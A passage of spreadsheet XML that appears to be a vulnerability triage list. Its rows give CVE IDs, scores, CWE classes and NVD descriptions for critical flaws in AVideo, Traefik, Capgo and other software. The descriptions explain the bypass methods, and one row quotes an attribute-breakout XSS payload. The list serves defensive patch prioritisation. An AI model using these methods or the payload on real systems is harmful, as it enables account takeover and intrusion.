      <c r="J534" s="5" t="inlineStr"/>
      <c r="K534" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L534" s="5" t="inlineStr">
        <is>
          <t>Lara Dashboard before 1.3.0 contains an authentication bypass vulnerability in the screenshot-login route that allows unauthenticated attackers to authenticate as any user by email when APP_ENV is not production. Attackers can request the GET /screenshot-login/{email} endpoint with a registered email address to receive a fully authenticated session, enabling access to user administration, settings, database contents, and arbitrary code execution through the module installer.</t>
        </is>
      </c>
      <c r="M534" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86184</t>
        </is>
      </c>
    </row>
    <row r="535">
      <c r="A535" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B535" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86189</t>
        </is>
      </c>
      <c r="C535" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D535" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E535" s="5" t="inlineStr"/>
      <c r="F535" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G535" s="5" t="inlineStr"/>
      <c r="H535" s="5" t="inlineStr"/>
      <c r="I535" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J535" s="5" t="inlineStr"/>
      <c r="K535" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L535" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo contains a path traversal vulnerability in notify.ffmpeg.json.php that allows unauthenticated attackers to write files to arbitrary locations by supplying a caller-chosen path in the avideoRelativePath parameter. Attackers can replay any previously issued ciphertext as a notifyCode token, which is decrypted but never validated, to bypass authentication and write files to the application root and subdirectories.</t>
        </is>
      </c>
      <c r="M535" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86189</t>
        </is>
      </c>
    </row>
    <row r="536">
      <c r="A536" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B536" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86190</t>
        </is>
      </c>
      <c r="C536" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D536" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E536" s="5" t="inlineStr"/>
      <c r="F536" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G536" s="5" t="inlineStr"/>
      <c r="H536" s="5" t="inlineStr"/>
      <c r="I536" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J536" s="5" t="inlineStr"/>
      <c r="K536" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L536" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo contains a broken access control vulnerability in videoViewsInfo endpoints that returns complete user records including password hashes, recovery tokens, and live session identifiers to unauthenticated callers when a hash parameter is provided. Attackers can use the disclosed session identifier to hijack viewer sessions, including administrator accounts, and obtain sensitive personal data for all video viewers.</t>
        </is>
      </c>
      <c r="M536" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86190</t>
        </is>
      </c>
    </row>
    <row r="537">
      <c r="A537" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B537" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86296</t>
        </is>
      </c>
      <c r="C537" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D537" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E537" s="5" t="inlineStr"/>
      <c r="F537" s="5" t="n">
        <v>0.013</v>
      </c>
      <c r="G537" s="5" t="inlineStr"/>
      <c r="H537" s="5" t="inlineStr"/>
      <c r="I537" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J537" s="5" t="inlineStr"/>
      <c r="K537" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="L537" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in D-Link DIR-822A A_101. This vulnerability affects the function strcpy of the file udhcpcd/serverpacket.c of the component udhcpcd. This manipulation causes stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized.</t>
        </is>
      </c>
      <c r="M537" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86296</t>
        </is>
      </c>
    </row>
    <row r="538">
      <c r="A538" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B538" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86543</t>
        </is>
      </c>
      <c r="C538" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D538" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E538" s="5" t="inlineStr"/>
      <c r="F538" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G538" s="5" t="inlineStr"/>
      <c r="H538" s="5" t="inlineStr"/>
      <c r="I538" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J538" s="5" t="inlineStr"/>
      <c r="K538" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L538" s="5" t="inlineStr">
        <is>
          <t>knowns versions before 0.30.0 serve the management API without authentication on all network interfaces by default, with no password required on fresh installations. Attackers can access the unauthenticated /api/tunnel/start endpoint to provision a public tunnel and republish the API at a publicly accessible address.</t>
        </is>
      </c>
      <c r="M538" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86543</t>
        </is>
      </c>
    </row>
    <row r="539">
      <c r="A539" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B539" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86738</t>
        </is>
      </c>
      <c r="C539" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D539" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E539" s="5" t="inlineStr"/>
      <c r="F539" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G539" s="5" t="inlineStr"/>
      <c r="H539" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="I539" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J539" s="5" t="inlineStr"/>
      <c r="K539" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L539" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 contain a CSS injection vulnerability in the Custom CSS field due to incomplete sanitization that reverses HTML encoding on greater-than and double-quote characters. Superusers can plant malicious CSS payloads using @import and url() references to exfiltrate CSRF tokens from other superusers via attribute-selector rules, enabling account takeover.</t>
        </is>
      </c>
      <c r="M539" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86738</t>
        </is>
      </c>
    </row>
    <row r="540">
      <c r="A540" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B540" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87929</t>
        </is>
      </c>
      <c r="C540" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D540" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E540" s="5" t="inlineStr"/>
      <c r="F540" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G540" s="5" t="inlineStr"/>
      <c r="H540" s="5" t="inlineStr"/>
      <c r="I540" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J540" s="5" t="inlineStr"/>
      <c r="K540" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="L540" s="5" t="inlineStr">
        <is>
          <t>MaxSite CMS through 109.6 ships with a hardcoded session encryption key in application/config/config.php that is never changed during installation, allowing unauthenticated attackers to forge administrator session cookies. Attackers can mint a malicious ci_session cookie with administrator privileges by computing an HMAC-SHA1 using the publicly known encryption key, bypassing authentication checks in is_login() and mso_check_allow() functions.</t>
        </is>
      </c>
      <c r="M540" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87929</t>
        </is>
      </c>
    </row>
    <row r="541">
      <c r="A541" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B541" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88069</t>
        </is>
      </c>
      <c r="C541" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D541" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E541" s="5" t="inlineStr"/>
      <c r="F541" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G541" s="5" t="inlineStr"/>
      <c r="H541" s="5" t="inlineStr"/>
      <c r="I541" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J541" s="5" t="inlineStr"/>
      <c r="K541" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L541" s="5" t="inlineStr">
        <is>
          <t>Pandora contains a path traversal vulnerability in its archive extraction worker. When processing a specially crafted archive or disk image, attacker-controlled file paths could be used without ensuring that the resulting destination remained within the intended extraction directory.
An attacker able to submit a malicious file for analysis could use path traversal sequences or crafted paths to cause extracted content to be written outside the designated extraction directory, potentially overwriting files accessible to the Pandora worker process. Successful exploitation could result in unauthorized modification of application or system files, denial of service, and potentially further compromise depending on the permissions of the Pandora process and the files that can be overwritten.
The vulnerability is addressed by resolving each extraction destination path before writing and verifying that it remains below the expected extraction directory. Extraction attempts resolving outside this directory are rejected and reported as path traversal attempts.</t>
        </is>
      </c>
      <c r="M541" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88069</t>
        </is>
      </c>
    </row>
    <row r="542">
      <c r="A542" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B542" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88860</t>
        </is>
      </c>
      <c r="C542" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D542" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E542" s="5" t="inlineStr"/>
      <c r="F542" s="5" t="inlineStr"/>
      <c r="G542" s="5" t="inlineStr"/>
      <c r="H542" s="5" t="inlineStr"/>
      <c r="I542" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J542" s="5" t="inlineStr"/>
      <c r="K542" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L542" s="5" t="inlineStr">
        <is>
          <t>Capgo fails to clean up channel permission overrides when a user's last organization role binding is deleted, leaving stale overrides active. Attackers can retain channel-specific permissions after their base RBAC access has been revoked to perform unauthorized actions like changing production OTA versions.</t>
        </is>
      </c>
      <c r="M542" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88860</t>
        </is>
      </c>
    </row>
    <row r="543">
      <c r="A543" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B543" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88864</t>
        </is>
      </c>
      <c r="C543" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D543" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E543" s="5" t="inlineStr"/>
      <c r="F543" s="5" t="inlineStr"/>
      <c r="G543" s="5" t="inlineStr"/>
      <c r="H543" s="5" t="inlineStr"/>
      <c r="I543" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J543" s="5" t="inlineStr"/>
      <c r="K543" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L543" s="5" t="inlineStr">
        <is>
          <t>Capgo (capgo.app) fails to restrict direct write access to the public.sso_providers table exposed through Supabase PostgREST. A holder of an ordinary Capgo full API key can insert a row with status='active' and enforce_sso=true, bypassing the intended backend SSO provisioning route (supabase/functions/_backend/private/sso/providers.ts) and its controls: the Enterprise plan requirement, SSO provider creation via the Supabase Management API, DNS TXT domain-ownership verification, the pending_verification → verified → active status transition, and issuance of a trusted provider ID by Supabase Auth. The forged row is trusted by SSO discovery and enforcement logic, including the unauthenticated login preflight endpoint /private/sso/check-domain, which then reports {"has_sso": true, "enforce_sso": true} for domains that were never verified, allowing attacker-controlled SSO enforcement to be asserted for arbitrary domains and disrupting normal login. All versions are affected; at the time of the advisory no patch was available.</t>
        </is>
      </c>
      <c r="M543" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88864</t>
        </is>
      </c>
    </row>
    <row r="544">
      <c r="A544" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B544" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88866</t>
        </is>
      </c>
      <c r="C544" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D544" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E544" s="5" t="inlineStr"/>
      <c r="F544" s="5" t="inlineStr"/>
      <c r="G544" s="5" t="inlineStr"/>
      <c r="H544" s="5" t="inlineStr"/>
      <c r="I544" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J544" s="5" t="inlineStr"/>
      <c r="K544" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L544" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a stored cross-site scripting vulnerability in the LoginControl plugin that fails to encode the User-Agent header before storing it in login history. Attackers with any valid login account can inject malicious scripts in the User-Agent header that execute in administrator browsers when viewing the Login History page, allowing script execution within the administrator session.</t>
        </is>
      </c>
      <c r="M544" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88866</t>
        </is>
      </c>
    </row>
    <row r="545">
      <c r="A545" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B545" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88867</t>
        </is>
      </c>
      <c r="C545" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D545" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E545" s="5" t="inlineStr"/>
      <c r="F545" s="5" t="inlineStr"/>
      <c r="G545" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H545" s="5" t="inlineStr"/>
      <c r="I545" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J545" s="5" t="inlineStr"/>
      <c r="K545" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L545" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo, in versions up to and including commit c3edcc274c389816d434acadac07ee78eaf330c1, contains a stored cross-site scripting vulnerability. objects/categoryAddNew.json.php passes the POST parameters `name` and `iconClass` to Category::setName() and Category::setIconClass(), which store the values without sanitization (setName only truncates to 45 characters). The category name is later echoed as HTML text and iconClass is echoed into a class attribute in view/modeYoutubeBottom.php and in Gallery cards (plugin/Gallery/functions.php). When the CustomizeUser option usersCanCreateNewCategories is enabled, any authenticated user with canUpload permission (granted by default via self-registration) can create a category containing a JavaScript payload; the payload then executes in the browser of any visitor, including administrators, who views a watch page or gallery entry for a video assigned to that category, allowing actions such as authenticated requests with the victim's session. The issue was unpatched at the time of reporting.</t>
        </is>
      </c>
      <c r="M545" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88867</t>
        </is>
      </c>
    </row>
    <row r="546">
      <c r="A546" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B546" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88868</t>
        </is>
      </c>
      <c r="C546" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D546" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E546" s="5" t="inlineStr"/>
      <c r="F546" s="5" t="inlineStr"/>
      <c r="G546" s="5" t="inlineStr"/>
      <c r="H546" s="5" t="inlineStr"/>
      <c r="I546" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J546" s="5" t="inlineStr"/>
      <c r="K546" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L546" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a stored cross-site scripting vulnerability in the LiveLinks plugin where title and description fields are stored without sanitization. A user with canStream permission can inject malicious scripts that execute in the browser of every visitor viewing the live-link page, including administrators, within the site origin.</t>
        </is>
      </c>
      <c r="M546" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88868</t>
        </is>
      </c>
    </row>
    <row r="547">
      <c r="A547" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B547" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88869</t>
        </is>
      </c>
      <c r="C547" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D547" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E547" s="5" t="inlineStr"/>
      <c r="F547" s="5" t="inlineStr"/>
      <c r="G547" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H547" s="5" t="inlineStr"/>
      <c r="I547" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J547" s="5" t="inlineStr"/>
      <c r="K547" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L547" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a stored cross-site scripting vulnerability in the AD_Server plugin's log.php endpoint that fails to escape the label parameter before storage. An unauthenticated attacker can inject malicious HTML through the label parameter, which is later rendered unsanitized in the admin Ad Types report using jQuery .html(), allowing execution of arbitrary JavaScript in an administrator's browser session.</t>
        </is>
      </c>
      <c r="M547" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88869</t>
        </is>
      </c>
    </row>
    <row r="548">
      <c r="A548" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B548" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88877</t>
        </is>
      </c>
      <c r="C548" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D548" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E548" s="5" t="inlineStr"/>
      <c r="F548" s="5" t="inlineStr"/>
      <c r="G548" s="5" t="inlineStr">
        <is>
          <t>nginx, kubernetes</t>
        </is>
      </c>
      <c r="H548" s="5" t="inlineStr"/>
      <c r="I548" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J548" s="5" t="inlineStr"/>
      <c r="K548" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L548" s="5" t="inlineStr">
        <is>
          <t>Traefik is a HTTP reverse proxy and load balancer. In versions &gt;= v3.7.0 and &lt;= v3.7.11, the Kubernetes ingress-nginx provider mishandles Ingresses that carry both an authentication annotation and the nginx.ingress.kubernetes.io/from-to-www-redirect annotation. For such Ingresses the provider creates an additional 'sibling' router that matches on the host alone, carries only the RedirectRegex middleware, and still points at the parent router's protected backend service. Because RedirectRegex is not a terminal handler, a request its pattern does not match is forwarded to the backend, and because the redirect pattern only accepts a numeric port while Traefik's host matcher canonicalizes the authority via net.SplitHostPort, a request with a non-numeric or empty port (for example 'Host: www.example.com:x') selects the sibling router, misses the redirect, and is proxied to the protected backend with none of the Ingress's annotation-derived middlewares applied. This discards not only authentication (e.g. BasicAuth) but every annotation-derived middleware, including source-IP allowlisting. Traefik v2 and v3 releases before v3.7.0 are not affected. The issue is fixed in v3.7.12.</t>
        </is>
      </c>
      <c r="M548" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88877</t>
        </is>
      </c>
    </row>
    <row r="549">
      <c r="A549" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B549" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88899</t>
        </is>
      </c>
      <c r="C549" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D549" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E549" s="5" t="inlineStr"/>
      <c r="F549" s="5" t="inlineStr"/>
      <c r="G549" s="5" t="inlineStr"/>
      <c r="H549" s="5" t="inlineStr"/>
      <c r="I549" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J549" s="5" t="inlineStr"/>
      <c r="K549" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L549" s="5" t="inlineStr">
        <is>
          <t>knowns versions before 0.31.0 fail to properly validate the x-opencode-directory request header in the /api/opencode proxy endpoint. Remote attackers can supply arbitrary directory paths to execute file operations outside the project root on the host system.</t>
        </is>
      </c>
      <c r="M549" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88899</t>
        </is>
      </c>
    </row>
    <row r="550">
      <c r="A550" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B550" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89042</t>
        </is>
      </c>
      <c r="C550" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D550" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E550" s="5" t="inlineStr"/>
      <c r="F550" s="5" t="inlineStr"/>
      <c r="G550" s="5" t="inlineStr"/>
      <c r="H550" s="5" t="inlineStr"/>
      <c r="I550" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J550" s="5" t="inlineStr"/>
      <c r="K550" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L550" s="5" t="inlineStr">
        <is>
          <t>passport-saml-encrypted through 0.1.13 makes SAML signature verification conditional on an optional cert option, allowing attackers to bypass authentication by submitting unsigned SAML responses. Attackers can post forged SAML responses with arbitrary NameID and attributes to the assertion consumer service endpoint to receive authenticated profiles without valid signatures.</t>
        </is>
      </c>
      <c r="M550" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89042</t>
        </is>
      </c>
    </row>
    <row r="551">
      <c r="A551" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B551" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89249</t>
        </is>
      </c>
      <c r="C551" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D551" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E551" s="5" t="inlineStr"/>
      <c r="F551" s="5" t="inlineStr"/>
      <c r="G551" s="5" t="inlineStr"/>
      <c r="H551" s="5" t="inlineStr"/>
      <c r="I551" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J551" s="5" t="inlineStr"/>
      <c r="K551" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L551" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a stored cross-site scripting vulnerability in the YPTWallet plugin where user-supplied CryptoWallet values are base64-encoded but not HTML-escaped before storage in wallet_log.information. Administrators viewing pending withdrawal requests in pendingRequests.php execute the stored markup in their session, allowing attackers to perform administrative actions via same-origin fetch requests.</t>
        </is>
      </c>
      <c r="M551" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89249</t>
        </is>
      </c>
    </row>
    <row r="552">
      <c r="A552" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B552" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89253</t>
        </is>
      </c>
      <c r="C552" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D552" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E552" s="5" t="inlineStr"/>
      <c r="F552" s="5" t="inlineStr"/>
      <c r="G552" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H552" s="5" t="inlineStr"/>
      <c r="I552" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J552" s="5" t="inlineStr"/>
      <c r="K552" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L552" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a stored cross-site scripting vulnerability in the user 'donationLink' profile field. User::setDonationLink() (objects/user.php) stores the value and save() validates it only with filter_var(..., FILTER_VALIDATE_URL), which accepts strings such as http://evil.example/"onmouseover=alert(document.domain)//, while getDonationLink() applies only strip_tags() and does not encode double quotes. plugin/CustomizeUser/actionButton.php echoes the value unencoded into an &lt;a href="..."&gt; attribute, and that button is included from view/modeYoutubeBottom.php on the watch page when the CustomizeUser option allowDonationLink is enabled. An authenticated user who updates their own profile via objects/userUpdate.json.php can therefore break out of the href attribute and inject an event handler that executes JavaScript in the browser of any visitor—including an administrator—who views the attacker's videos and interacts with (for example, hovers over) the donation button. The issue was unfixed at the time of reporting.</t>
        </is>
      </c>
      <c r="M552" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89253</t>
        </is>
      </c>
    </row>
    <row r="553">
      <c r="A553" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B553" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89254</t>
        </is>
      </c>
      <c r="C553" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D553" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E553" s="5" t="inlineStr"/>
      <c r="F553" s="5" t="inlineStr"/>
      <c r="G553" s="5" t="inlineStr"/>
      <c r="H553" s="5" t="inlineStr"/>
      <c r="I553" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J553" s="5" t="inlineStr"/>
      <c r="K553" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L553" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a stored cross-site scripting vulnerability in the CustomizeUser plugin where the field_name parameter is stored raw without sanitization. Administrators can inject malicious scripts via the add.json.php endpoint that execute when viewing extra info pages or profile forms that render the typeToHTML function.</t>
        </is>
      </c>
      <c r="M553" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89254</t>
        </is>
      </c>
    </row>
    <row r="554">
      <c r="A554" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B554" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89255</t>
        </is>
      </c>
      <c r="C554" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="D554" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E554" s="5" t="inlineStr"/>
      <c r="F554" s="5" t="inlineStr"/>
      <c r="G554" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H554" s="5" t="inlineStr"/>
      <c r="I554" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J554" s="5" t="inlineStr"/>
      <c r="K554" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L554" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a stored cross-site scripting vulnerability in the LoginControl plugin that fails to HTML-encode PGP public keys echoed into a textarea element. An authenticated attacker can inject malicious JavaScript by submitting a crafted public key, which executes in an administrator's session when viewing the user's profile tab.</t>
        </is>
      </c>
      <c r="M554" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89255</t>
        </is>
      </c>
    </row>
    <row r="555">
      <c r="A555" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B555" s="5" t="inlineStr">
        <is>
